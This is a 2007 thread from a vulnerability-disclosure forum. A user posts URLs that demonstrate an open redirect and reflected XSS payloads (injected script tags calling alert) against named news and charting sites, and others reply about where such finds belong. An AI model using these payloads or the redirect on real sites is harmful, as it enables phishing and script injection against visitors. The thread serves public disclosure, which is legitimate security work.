Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Some findings
Posted by: inzel
Date: August 23, 2007 01:40PM

Here are some links to some findings Spyware and I found.

http://online.wsj.com/wsjgate?source=nojs&URI=http://google.com - Phising redirect

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E - XSS

http://online.wsj.com/public/quotes/main.html?type=usstock+usfund&mod=hpp_us_indexes&symbol=</script>%3Cscript%3Ealert(1337)%3C/script%3E - XSS

http://chart.bigcharts.com/custom/wsjie/wsjie-nshsm-frontpage-indxchart.img?sid=33333333333333333333333333333333333
- Overflow

http://chart.bigcharts.com/custom/wsjie/wsjie-nshsm-frontpage-indxchart.img?sid=%3Cscript%3Ealert(1234)%3C/script%3E
-Still trying to get it to spit the source...


Anyways, nothing special. Just wanted to post it to post it. :)


--inzel--

Options: ReplyQuote
Re: Some findings
Posted by: Spyware
Date: August 23, 2007 04:39PM

Ehr, :P.

The xss'es you find are supposed to be posted in the big topic in "full disclosure". And the "overflow" isn't a overflow it's a bug remember.

Ah well, I'll catch you later on msn or something.

*he's new*

Options: ReplyQuote
Re: Some findings
Posted by: inzel
Date: August 24, 2007 06:25AM

Meh, sry about that. Hes right... Im brand new ;)


--inzel--

Options: ReplyQuote
Re: Some findings
Posted by: id
Date: August 24, 2007 09:45AM

YOU WILL BURN IN HELL FOR YOUR TRANSGRESSIONS!!

or just don't do it again please.

-id

Options: ReplyQuote


Sorry, only registered users may post in this forum.